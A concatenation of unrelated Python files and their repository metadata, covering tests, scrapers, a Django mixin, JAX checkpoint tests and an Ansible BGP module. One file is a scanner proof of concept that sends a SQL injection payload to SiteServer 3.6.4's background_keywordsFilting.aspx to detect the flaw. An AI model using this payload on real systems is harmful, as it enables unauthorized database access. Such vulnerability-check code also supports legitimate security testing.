self.assertEqual(shop.status_code, 201)
except Exception as e:
raise AssertionError('Shop service is down or something went wrong\n' + str(e))
def test_new_purchase(self):
try:
slots = requests.get(self.__shop_host + '/1/get_slots').json()
self.assertTrue(any([x['name'] == 'testcake' for x in slots['response']['result']]))
slots = slots['response']['result']
slot = None
for x in slots:
if x['name'] == 'testcake':
slot = x
break
r = requests.post(self.__shop_host + '/1/new_purchase', json={
"slot_id": slot['id'],
"count": 1,
"user_id": 1,
"method": "card"
})
self.assertEqual(r.status_code, 200)
r = requests.post(self.__shop_host + '/1/new_purchase', json={
"slot_id": slot['id'],
"count": 100,
"user_id": 1,
"method": "card"
})
self.assertEqual(r.status_code, 424)
except Exception as e:
raise AssertionError('Shop service is down or something went wrong\n' + str(e))
if __name__ == '__main__':
unittest.main()
|
[
"savap0@yandex.ru"
] |
savap0@yandex.ru
|
9fda03d01e11adae9c1c4533fc5502a2d6fe71d9
|
ba9e1fc7797ebc55a61a40ee66c51b467f353ff1
|
/web_scraping_with_python_demos/2-cleangrams.py
|
1c489e8f587b8315ebadba2f6d45592f570f395e
|
[] |
no_license
|
sanpianye/the-little-python
|
77c938164d43cbb120063a6d17d0705cc9e92e93
|
c04898bf0812afb53b71567699ee523d1bc56a29
|
refs/heads/master
| 2021-06-14T01:55:31.452777
| 2017-03-09T13:31:59
| 2017-03-09T13:31:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,860
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
''''''
__author__ = 'Engine'
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import string
from collections import OrderedDict
def cleanInput(input):
input = re.sub("\n+", " ", input) # 将多个换行符转为一个空格
input = re.sub("\[[0-9]*\]", "", input) # 剔除维基百科的引用标记,如[1]
input = re.sub(" +", " ", input) # 将多个空格合并为1个空格, 确保单词间只有一个空格
# 以utf8编码,再以ascii解码, 剔除unicode字符
input = bytes(input, "UTF-8")
input = input.decode("ascii", "ignore")
cleanInput = []
input = input.split(' ') # 以空格分割单词, 获得单词的list
for item in input:
# 剔除单词两边的标点符号,有点矫枉过正
item = item.strip(string.punctuation)
# 剔除单字符, 除非是i或a
if len(item) > 1 or (item.lower() == 'a' or item.lower() == 'i'):
cleanInput.append(item)
return cleanInput
def getNgrams(input, n):
input = cleanInput(input) # 数据清洗
output = dict() # 创建字典, 用于保存n元 组
for i in range(len(input) - n + 1):
newNGram = ' '.join(input[i:i+n]) # 相邻的单词构成一个n元组
if newNGram in output: # 统计n元组的词频
output[newNGram] += 1
else:
output[newNGram] = 1
return output
request = "http://en.wikipedia.org/wiki/Python_(programming_language)"
response = urlopen(request)
bsObj = BeautifulSoup(response)
# 获取词条的主体部分内容
input = bsObj.find("div", {"id": "mw-content-text"}).get_text() # str
ngrams = getNgrams(input, 2) # 获取2元 组
# 对n元组按词频排序
ngrams = OrderedDict(sorted(ngrams.items(), key=lambda t: t[1], reverse=True))
print(ngrams)
|
[
"enginechen07@gmail.com"
] |
enginechen07@gmail.com
|
070b67571830fbc22ce4702fded26ee0e03f646a
|
6d7c488d14cf2bc0322c955a53ec34cfd67e8c3b
|
/.history/plane_ticket/spiders/ticket_spider_20200709002008.py
|
9258ec92ad4166dbf5107784494df0a8a3454021
|
[] |
no_license
|
byebyeyuchi/getPlaneTicket-web-crawl-
|
e247b7d015e35d1036e023c748764abb0ad66fe1
|
91a666659a537c053d8cd19c8214a54eab460800
|
refs/heads/main
| 2023-02-25T21:43:53.046865
| 2021-01-30T02:14:43
| 2021-01-30T02:14:43
| 334,308,704
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 274
|
py
|
import scrapy
class TicketSpider(scrapy.Spider):
name = "tickets"
def start_requests(self):
urls =[
"http://montreal.chineseconsulate.org/chn/zlgxw/"
]
def parse(self, response):
all = response.css('.Text_Center li').css()
|
[
"delseylyq@gmail.com"
] |
delseylyq@gmail.com
|
9c0565a7a799b4d983060bea22a4462692fd3731
|
2b0eab74af8d23244ff11699830f9bb10fbd717a
|
/helpers/mixins/store_data_with_default_value_by_key.py
|
e418e8fb8cbcfde82dbe0fe1b92fbd4096f04bed
|
[] |
no_license
|
alexandrenorman/mixeur
|
c7e25cd20b03c78b361cb40e3e359a6dc5d9b06b
|
95d21cd6036a99c5f399b700a5426e9e2e17e878
|
refs/heads/main
| 2023-03-13T23:50:11.800627
| 2021-03-07T15:49:15
| 2021-03-07T15:49:15
| 345,384,858
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,174
|
py
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.core.exceptions import ValidationError
from core.models import MixeurBaseModel
class StoreDataWithDefaultValueByKey(MixeurBaseModel):
"""
Mixin for storing value with a unique default value for all
and a unique default value for each item associated by key
"""
class Meta:
abstract = True
ordering = ("created_at",)
is_default_value = models.BooleanField(
_("est une valeur par défaut"), default=False
)
@classmethod
def default_value(cls, key=None):
"""
Return default value which is:
- default value for the key if exists
- else generic default value if exists
- else None
"""
if key:
if cls.objects.filter(key=key).exists():
return cls.objects.filter(key=key).first()
if cls.objects.filter(key=None).exists():
return cls.objects.filter(key=None).first()
return None
def clean(self):
"""
verify that:
- an unique value exists without a key
- an unique value exists with a key
"""
if self.is_default_value:
if (
self.key is None
and self.__class__.objects.exclude(pk=self.pk)
.filter(key=None, is_default_value=True)
.exists()
):
raise ValidationError(
"Une seule valeur par défaut générique est possible"
)
if (
self.key is not None
and self.__class__.objects.exclude(pk=self.pk)
.filter(key=self.key, is_default_value=True)
.exists()
):
raise ValidationError(
"Une seule valeur par défaut par clef est possible"
)
else:
if self.key is None:
raise ValidationError(
"Une valeur non générique doit être associée à une clef"
)
return super().clean()
|
[
"norman@xael.org"
] |
norman@xael.org
|
42ce348fe55b62181045120eb229a2509121b694
|
86f2eb787624e293be660fa97f6bbb35980f2e29
|
/translate-app-tkinter/app/utils/thread.py
|
11fc4e975c3224a345df30657371cadb3b9e9957
|
[
"MIT"
] |
permissive
|
jadsonlucio/holidays-projects
|
73e762b7d5669b8850f3fcecf59aa152430c2d19
|
136992f499d37640decf67072280ae87b83fe830
|
refs/heads/master
| 2023-05-09T03:55:24.433421
| 2020-10-27T13:13:01
| 2020-10-27T13:13:01
| 256,420,473
| 2
| 0
| null | 2021-06-02T01:30:37
| 2020-04-17T06:26:05
|
Python
|
UTF-8
|
Python
| false
| false
| 273
|
py
|
from threading import Thread
from functools import wraps
def run_async(func):
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target = func, args = args, kwargs = kwargs)
func_hl.start()
return func_hl
return async_func
|
[
"jadsonaluno@hotmail.com"
] |
jadsonaluno@hotmail.com
|
bbb837d0aac28477a37baa05d3dd3c36167bc5b7
|
8b59108f621e94935b3b72aae3c441e10cb64a1c
|
/create_uneeded_icons.py
|
cdb3dda6906313546c12ebd032e4aa2accfd9755
|
[] |
no_license
|
CyberSys/CE_Python
|
97a373b1fe2d214ae854d454dc5e7d79bc150d8e
|
721ac005e215f1225fb3c99491b55dc48b19ab30
|
refs/heads/master
| 2022-01-13T08:04:08.558594
| 2019-07-22T17:05:46
| 2019-07-22T17:05:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,542
|
py
|
from shutil import copyfile
import os
if __name__ == "__main__":
uneeded_icons = [
"AssaultScope_48.png",
"ATButtstockTS_48.png",
"ATFrontsightTS_48.png",
"ATHandguardARS_48.png",
"ExtendedClip_48.png",
"FlashlightAcc_48.png",
"Ironsight_48.png",
"NewSilencer_48.png",
"NoAttachmentBarrel_48.png",
"NoAttachmentBottom_48.png",
"Scope12x_48.png",
"ammo_12_gauge_pellet_48.png",
"ammo_12_gauge_slug_48.png",
"ammo_22_48.png",
"ammo_223_48.png",
"ammo_308_48.png",
"ammo_357_48.png",
"ammo_5_56x45_48.png",
"ammo_7_62x51_48.png",
"ammo_9mm_48.png",
"ammo_acp_45_48.png",
"Arrow_0000_48.png",
"Arrow_000P_48.png",
"Arrow_00R0_48.png",
"Arrow_00RP_48.png",
"Arrow_0B00_48.png",
"Arrow_0B0P_48.png",
"Arrow_0BR0_48.png",
"Arrow_0BRP_48.png",
"Arrow_F000_48.png",
"Bolt_0000_48.png",
"Bolt_000P_48.png",
"Bolt_00R0_48.png",
"Bolt_00RP_48.png",
"Bolt_0B00_48.png",
"Bolt_0B0P_48.png",
"Bolt_0BR0_48.png",
"Bolt_0BRP_48.png",
"Bolt_F000_48.png",
"ChemlightBlue_48.png",
"ChemlightGreen_48.png",
"ChemlightRed_48.png",
"ChemlightWhite_48.png",
"ChemlightYellow_48.png",
"Flare_48",
"Flashbang_48.png",
"GrenadeBottle_48.png",
"GrenadeMolotov_48.png",
"GrenadeSmokeGreen_48.png",
"GrenadeSmokeMagenta_48.png",
"GrenadeSmokeRed_48.png",
"GrenadeSmokeWhite_48.png",
"GrenadeSmokeYellow_48.png",
"Pipebomb_48.png",
"animated_search_light_48.png",
"entity_test_48.png",
"entity_test_packed_48.png",
"PlotSign_48.png",
"powered_flood_light_48.png",
"tire_single_48.png",
"DieselGenerator_48.png",
"WaterPurifictionTablets_48.png",
"CampingTentBlue_48.png",
"CampingTentBrown_48.png",
"CampingTentGreen_48.png",
"CampingTentOrange_48.png",
"CampingTentPurple_48.png",
"CampingTentRed_48.png",
"CampingTentYellow_48.png",
"PackedCampingTent_48.png",
"PackedTrekkingTent_48.png",
"PupTentBlue_48.png",
"PupTentBrown_48.png",
"PupTentGreen_48.png",
"PupTentRed_48.png",
"PupTentTan_48.png",
"TrekkingTentBlue_48.png",
"TrekkingTentBrown_48.png",
"TrekkingTentGreen_48.png",
"TrekkingTentOrange_48.png",
"TrekkingTentPurple_48.png",
"TrekkingTentRed_48.png",
"TrekkingTentYellow_48.png",
"TwoPersonTentBlue_48.png",
"TwoPersonTentBrown_48.png",
"TwoPersonTentGreen_48.png",
"TwoPersonTentOrange_48.png",
"TwoPersonTentPurple_48.png",
"TwoPersonTentRed_48.png",
"TwoPersonTentYellow_48.png",
"FlashbangPickup_48.png",
"Binoculars_48.png",
"DebugPistol_48.png",
"NoWeapon_48.png",
"PickAndThrowWeapon_48.png",
]
for x in uneeded_icons:
copyfile(
os.path.normpath(
"D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images/no_icon_48.png"
),
os.path.join("D:/perforce/dev/GameSDK/Libs/UI/Inventory/item_images", x),
)
|
[
"chrissprance@gmail.com"
] |
chrissprance@gmail.com
|
634db64fad5672d244b9dde45ed05c57dca1210d
|
a1b21aa9b4c3b99b9b16fd47686bcc76e6fafd18
|
/unit_test/function_test/test_name_function.py
|
9852039917d53af0689e6cada925c25852cced60
|
[] |
no_license
|
irfan87/python_tutorial
|
986c5dae98a5ad928c3820bf0355f544c091caf0
|
71bbf8b8aba2d5a1fafc56b8cb15d471c428a0cf
|
refs/heads/master
| 2020-06-05T00:52:07.619489
| 2019-08-19T02:56:41
| 2019-08-19T02:56:41
| 192,257,432
| 0
| 0
| null | 2019-08-19T02:56:42
| 2019-06-17T01:53:46
|
Python
|
UTF-8
|
Python
| false
| false
| 643
|
py
|
import unittest
from name_function import get_formatted_name
class NamesTestCase(unittest.TestCase):
"""Tests for 'name_function.py"""
def test_first_last_name(self):
"""Do names like 'Janis Joplin' work?"""
formatted_name = get_formatted_name('janis', 'joplin')
self.assertEqual(formatted_name, 'Janis Joplin')
def test_first_last_middle_name(self):
"""Do names like 'Wolfgang Amadeus Mozart' work?"""
formatted_name = get_formatted_name('wolfgang', 'mozart', 'amadeus')
self.assertEqual(formatted_name, 'Wolfgang Amadeus Mozart')
if __name__ == '__main__':
unittest.main()
|
[
"nerve2009@yahoo.com"
] |
nerve2009@yahoo.com
|
ed7aeccf50b61c1ede46b34c971ecbf6fac49f40
|
90baf1f6abb0dcba147f46105347a7d81f0ed617
|
/472-concatenated-words/472-concatenated-words.py
|
1541cd05cdd590100ef56d987a207bccb9cf9176
|
[] |
no_license
|
vinija/LeetCode
|
c2bfbd78711b2ebedcfd4f834d12fde56a15b460
|
de2727f1cc52ce08a06d63cff77b6ef6bb9d2528
|
refs/heads/master
| 2022-09-29T06:16:44.465457
| 2022-08-21T05:20:45
| 2022-08-21T05:20:45
| 97,401,204
| 116
| 32
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 830
|
py
|
# ORIGINAL POST WITH EXPLANATION: https://leetcode.com/problems/concatenated-words/discuss/871866/Easyway-Explanation-every-step
class Solution(object):
def findAllConcatenatedWordsInADict(self, words):
"""
:type words: List[str]
:rtype: List[str]
"""
d = set(words)
def dfs(word):
for i in range(1, len(word)):
prefix = word[:i]
suffix = word[i:]
if prefix in d and suffix in d:
return True
if prefix in d and dfs(suffix):
return True
return False
res = []
for word in words:
if dfs(word):
res.append(word)
return res
|
[
"vinija@gmail.com"
] |
vinija@gmail.com
|
09350b78ae65b299217cbd7c1567d5543b66ea37
|
37a119f116431ef91f1257370a5cd4a992b018db
|
/tests/sql/test_expressions.py
|
123319ebd94792d6d470655ae8be31eb2e22416f
|
[
"ISC"
] |
permissive
|
uranusjr/sqlian
|
660e66d4c5c01b1112961f4097e95143c15cf72a
|
8f029e91af032e23ebb95cb599aa7267ebe75e05
|
refs/heads/master
| 2021-01-19T18:59:19.349318
| 2017-09-12T13:12:10
| 2017-09-12T13:12:10
| 101,176,270
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 903
|
py
|
from sqlian import Sql
from sqlian.standard import expressions as e
def test_identifier(engine):
sql = e.Identifier('foo')
assert sql.__sql__(engine) == Sql('"foo"'), sql
def test_identifier_qualified(engine):
sql = e.Identifier('foo', 'bar')
assert sql.__sql__(engine) == Sql('"foo"."bar"'), sql
def test_is_null(engine):
sql = e.Equal(e.Identifier('foo'), None)
assert sql.__sql__(engine) == Sql('"foo" IS NULL'), sql
def test_is_not_null(engine):
sql = e.NotEqual(e.Identifier('foo'), None)
assert sql.__sql__(engine) == Sql('"foo" IS NOT NULL'), sql
def test_equal(engine):
sql = e.Equal(e.Identifier('foo', 'bar'), 42)
assert sql.__sql__(engine) == Sql('"foo"."bar" = 42'), sql
def test_not_equal(engine):
sql = e.NotEqual(e.Identifier('person', 'name'), 'Mosky')
assert sql.__sql__(engine) == Sql('"person"."name" != ' + "'Mosky'"), sql
|
[
"uranusjr@gmail.com"
] |
uranusjr@gmail.com
|
dd773633d85d0d1d73c0a0a758c4bdebd3107be2
|
6f7ba68d9e2ba6cfc7f07367bcd34a643f863044
|
/cms/siteserver/siteserver_background_keywordsFilting_sqli.py
|
24feed6f2a0c31d35687f1091c3bcc6d3214f82b
|
[] |
no_license
|
deepwebhacker/Dxscan
|
2e803ee01005a1d0a7802290bfb553f99e8fcf2e
|
eace0872e1deb66d53ec7cfc62f4c793f9421901
|
refs/heads/main
| 2023-03-06T10:26:23.371926
| 2021-02-22T14:03:51
| 2021-02-22T14:03:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,719
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: siteserver3.6.4 background_keywordsFilting.aspx注入
referer: http://www.wooyun.org/bugs/wooyun-2013-043641
author: Lucifer
description: 文件/siteserver/bbs/background_keywordsFilting.aspx中,参数Keyword存在SQL注入。
'''
import sys
import requests
import warnings
from termcolor import cprint
class siteserver_background_keywordsFilting_sqli_BaseVerify:
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/bbs/background_keywordsFilting.aspx?grade=0&categoryid=0&keyword=test%27AnD%20ChAr(66)%2BChAr(66)%2BChAr(66)%2B@@VeRsIoN>0--"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
if r"BBBMicrosoft" in req.text:
cprint("[+]存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl, "red")
postdata = {self.url:"存在siteserver3.6.4 background_keywordsFilting.aspx注入漏洞...(高危)\tpayload: "+vulnurl}
requests.post('http://localhost:8848/cms', json=postdata)
else:
cprint("[-]不存在siteserver_background_keywordsFilting_sqli漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = siteserver_background_keywordsFilting_sqli_BaseVerify(sys.argv[1])
testVuln.run()
|
[
"noreply@github.com"
] |
deepwebhacker.noreply@github.com
|
98a9f68c969ed0299834aeafe3f5422274954ce7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/src/pycrunchbase/resource/news.py
|
67242ca520fe227c4dc5b1285fa4919f577e6495
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695
| 2023-07-03T13:27:06
| 2023-07-03T13:27:06
| 30,629,033
| 69
| 45
|
MIT
| 2020-12-02T02:26:40
| 2015-02-11T03:39:14
|
Python
|
UTF-8
|
Python
| false
| false
| 734
|
py
|
import six
from .node import Node
from .utils import parse_date
@six.python_2_unicode_compatible
class News(Node):
"""Represents a News on CrunchBase"""
KNOWN_PROPERTIES = [
"title",
"author",
"posted_on",
"url",
"created_at",
"updated_at",
]
def _coerce_values(self):
for attr in ['posted_on']:
if getattr(self, attr, None):
setattr(self, attr, parse_date(getattr(self, attr)))
def __str__(self):
return u'{title} by {author} on {posted_on}'.format(
title=self.title,
author=self.author,
posted_on=self.posted_on,
)
def __repr__(self):
return self.__str__()
|
[
"ngzhian@gmail.com"
] |
ngzhian@gmail.com
|
9102954aee63aa1de8128785de2d2f9e90d976f9
|
a79cccacfa422012caac481b5eff80f6e911d0af
|
/jax/experimental/gda_serialization/serialization_test.py
|
cef36c9f56c1553a70bcf8e80935396e0bf0d8b0
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
jblespiau/jax
|
f932fe6df23942756957db61655f6cc9c6d67d64
|
46a666c4489b9e04d2777cf2156453bc48a8e432
|
refs/heads/main
| 2022-04-17T01:50:55.041057
| 2022-04-15T08:49:52
| 2022-04-15T08:49:52
| 481,888,965
| 0
| 0
|
Apache-2.0
| 2022-04-15T08:20:44
| 2022-04-15T08:20:43
| null |
UTF-8
|
Python
| false
| false
| 6,163
|
py
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for serialization and deserialization of GDA."""
import pathlib
import unittest
from absl.testing import absltest
import jax
from jax._src import test_util as jtu
from jax._src import util
from jax.config import config
from jax.experimental import PartitionSpec as P
from jax.experimental.global_device_array import GlobalDeviceArray
from jax.experimental.gda_serialization import serialization
from jax.experimental.maps import Mesh
import numpy as np
config.parse_flags_with_absl()
def create_global_mesh(mesh_shape, axis_names):
size = util.prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f'Test requires {size} local devices')
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
class CheckpointTest(jtu.JaxTestCase):
def test_checkpointing(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
num = util.prod(global_input_shape)
# First GDA
global_input_data1 = np.arange(num).reshape(global_input_shape)
def cb1(index):
return global_input_data1[index]
gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb1)
ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
# Second GDA
global_input_data2 = np.arange(num, num + num).reshape(global_input_shape)
def cb2(index):
return global_input_data2[index]
gda2 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb2)
ckpt_dir2 = pathlib.Path(self.create_tempdir('second').full_path)
# Third GDA
def cb3(index):
return np.array([])
global_mesh1d = create_global_mesh((8,), ('x',))
gda3 = GlobalDeviceArray.from_callback((0,), global_mesh1d, P(None), cb3)
ckpt_dir3 = pathlib.Path(self.create_tempdir('third').full_path)
ckpt_paths = [str(ckpt_dir1), str(ckpt_dir2), str(ckpt_dir3)]
tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
serialization.run_serialization([gda1, gda2, gda3], tspecs)
m1, m2, m3 = serialization.run_deserialization(
[global_mesh, global_mesh, global_mesh1d],
[mesh_axes, P('x'), P(None)],
tspecs)
self.assertArraysEqual(m1.local_shards[0].data.to_py(),
np.array([[0], [2]]))
self.assertArraysEqual(m1.local_shards[1].data.to_py(),
np.array([[1], [3]]))
self.assertEqual(m1.local_shards[0].data.shape, (2, 1))
self.assertEqual(m1.dtype, np.int32)
self.assertArraysEqual(m2.local_shards[0].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertArraysEqual(m2.local_shards[1].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertEqual(m2.local_shards[0].data.shape, (2, 2))
self.assertEqual(m2.dtype, np.int32)
for i, s in enumerate(m3.local_shards):
self.assertEqual(s.index, (slice(None),))
self.assertEqual(s.replica_id, i)
self.assertArraysEqual(s.data.to_py(), np.array([]))
self.assertEqual(m3.dtype, np.float32)
def test_checkpointing_with_bigger_shape(self):
global_mesh = create_global_mesh((2, 2), ('x', 'y'))
global_input_shape = (8, 2)
num = util.prod(global_input_shape)
# First GDA
global_input_data1 = np.arange(num).reshape(global_input_shape)
def cb1(index):
return global_input_data1[index]
gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
P('x', 'y'), cb1)
ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
ckpt_paths = [str(ckpt_dir1)]
tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
serialization.run_serialization([gda1], tspecs)
m1, = serialization.run_deserialization(
[create_global_mesh((4, 2), ('x', 'y'))],
[P('x', 'y')],
tspecs,
[(12, 2)],
)
expected_data = {
0: np.array([[0], [2], [4]]),
1: np.array([[1], [3], [5]]),
2: np.array([[6], [8], [10]]),
3: np.array([[7], [9], [11]]),
4: np.array([[12], [14], [0]]),
5: np.array([[13], [15], [0]]),
6: np.array([[0], [0], [0]]),
7: np.array([[0], [0], [0]]),
}
for l in m1.local_shards:
self.assertArraysEqual(l.data.to_py(), expected_data[l.device.id])
def test_spec_has_metadata(self):
spec = {
'a': {
'b': 1,
'c': 2,
},
'd': 3,
'e': {
'a': 2,
'metadata': 3
},
'f': 4
}
self.assertTrue(serialization._spec_has_metadata(spec))
self.assertTrue(
serialization._spec_has_metadata({
'driver': 'zarr',
'kvstore': 'gfile',
'metadata': {
'chunks': 4,
'shape': (32, 64)
},
'one_more': 'thing'
}))
def test_spec_has_no_metadata(self):
spec = {
'a': {
'b': 1,
'c': 2,
},
'd': 3,
'e': {
'a': 2,
},
'f': 4
}
self.assertFalse(serialization._spec_has_metadata(spec))
def test_empty_spec_has_no_metadata(self):
spec = {}
self.assertFalse(serialization._spec_has_metadata(spec))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
[
"no-reply@google.com"
] |
no-reply@google.com
|
1958e4fd3cd5234c86f6dd7f259d43da2a520bd3
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03032/s283156387.py
|
473d0ed84ab4c0f25eab299ea36e78724919eff4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 400
|
py
|
n,k = map(int,input().split())
lis = list(map(int,input().split()))
ans = 0
for i in range(n):
for j in range(n-i+1):
num = lis[:i]
if j > 0:
num += lis[-j:]
if len(num) <= k:
cnt = min(len(num),k-len(num))
num.sort()
for h in range(cnt):
num[h] = max(0,num[h])
ans = max(ans,sum(num))
print(ans)
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
582302c3619958b67faf74202cdf4418340616c1
|
b2f8c41358f6c6f4ce78328695a7b4f96adf806b
|
/staff_crm/apps.py
|
c4f1bce309a4b15bd048c1a4cfc2964dc43f754b
|
[] |
no_license
|
funsojoba/staff_management_api
|
6f472ea0a53095b6860969cf88f87b50fea69729
|
792bc652ec61e3f0d16bab1ff36cf72643161dbe
|
refs/heads/main
| 2023-05-24T04:45:20.895495
| 2021-06-13T19:45:07
| 2021-06-13T19:45:07
| 373,336,004
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 149
|
py
|
from django.apps import AppConfig
class StaffCrmConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'staff_crm'
|
[
"42432746+funsojoba@users.noreply.github.com"
] |
42432746+funsojoba@users.noreply.github.com
|
2b1c888ed19da3073b1fcc9a4ad2599f84ed38f0
|
64bf39b96a014b5d3f69b3311430185c64a7ff0e
|
/intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/providers/cli/config/bgp/address_family.py
|
0e0ce1ab78fecbd074f6c23d7f5f4d6866007720
|
[
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
SimonFangCisco/dne-dna-code
|
7072eba7da0389e37507b7a2aa5f7d0c0735a220
|
2ea7d4f00212f502bc684ac257371ada73da1ca9
|
refs/heads/master
| 2023-03-10T23:10:31.392558
| 2021-02-25T15:04:36
| 2021-02-25T15:04:36
| 342,274,373
| 0
| 0
|
MIT
| 2021-02-25T14:39:22
| 2021-02-25T14:39:22
| null |
UTF-8
|
Python
| false
| false
| 5,305
|
py
|
#
# (c) 2019, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils.six import iteritems
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (
to_list,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.providers import (
CliProvider,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.cli.config.bgp.neighbors import (
AFNeighbors,
)
from ansible.module_utils.common.network import to_netmask
class AddressFamily(CliProvider):
def render(self, config=None):
commands = list()
safe_list = list()
router_context = "router bgp %s" % self.get_value("config.bgp_as")
context_config = None
for item in self.get_value("config.address_family"):
context = "address-family %s" % item["afi"]
if item["safi"] != "unicast":
context += " %s" % item["safi"]
context_commands = list()
if config:
context_path = [router_context, context]
context_config = self.get_config_context(
config, context_path, indent=1
)
for key, value in iteritems(item):
if value is not None:
meth = getattr(self, "_render_%s" % key, None)
if meth:
resp = meth(item, context_config)
if resp:
context_commands.extend(to_list(resp))
if context_commands:
commands.append(context)
commands.extend(context_commands)
commands.append("exit-address-family")
safe_list.append(context)
if self.params["operation"] == "replace":
if config:
resp = self._negate_config(config, safe_list)
commands.extend(resp)
return commands
def _negate_config(self, config, safe_list=None):
commands = list()
matches = re.findall(r"(address-family .+)$", config, re.M)
for item in set(matches).difference(safe_list):
commands.append("no %s" % item)
return commands
def _render_auto_summary(self, item, config=None):
cmd = "auto-summary"
if item["auto_summary"] is False:
cmd = "no %s" % cmd
if not config or cmd not in config:
return cmd
def _render_synchronization(self, item, config=None):
cmd = "synchronization"
if item["synchronization"] is False:
cmd = "no %s" % cmd
if not config or cmd not in config:
return cmd
def _render_networks(self, item, config=None):
commands = list()
safe_list = list()
for entry in item["networks"]:
network = entry["prefix"]
cmd = "network %s" % network
if entry["masklen"]:
cmd += " mask %s" % to_netmask(entry["masklen"])
network += " mask %s" % to_netmask(entry["masklen"])
if entry["route_map"]:
cmd += " route-map %s" % entry["route_map"]
network += " route-map %s" % entry["route_map"]
safe_list.append(network)
if not config or cmd not in config:
commands.append(cmd)
if self.params["operation"] == "replace":
if config:
matches = re.findall(r"network (.*)", config, re.M)
for entry in set(matches).difference(safe_list):
commands.append("no network %s" % entry)
return commands
def _render_redistribute(self, item, config=None):
commands = list()
safe_list = list()
for entry in item["redistribute"]:
option = entry["protocol"]
cmd = "redistribute %s" % entry["protocol"]
if entry["id"] and entry["protocol"] in (
"ospf",
"ospfv3",
"eigrp",
):
cmd += " %s" % entry["id"]
option += " %s" % entry["id"]
if entry["metric"]:
cmd += " metric %s" % entry["metric"]
if entry["route_map"]:
cmd += " route-map %s" % entry["route_map"]
if not config or cmd not in config:
commands.append(cmd)
safe_list.append(option)
if self.params["operation"] == "replace":
if config:
matches = re.findall(
r"redistribute (\S+)(?:\s*)(\d*)", config, re.M
)
for i in range(0, len(matches)):
matches[i] = " ".join(matches[i]).strip()
for entry in set(matches).difference(safe_list):
commands.append("no redistribute %s" % entry)
return commands
def _render_neighbors(self, item, config):
""" generate bgp neighbor configuration
"""
return AFNeighbors(self.params).render(
config, nbr_list=item["neighbors"]
)
|
[
"sifang@cisco.com"
] |
sifang@cisco.com
|
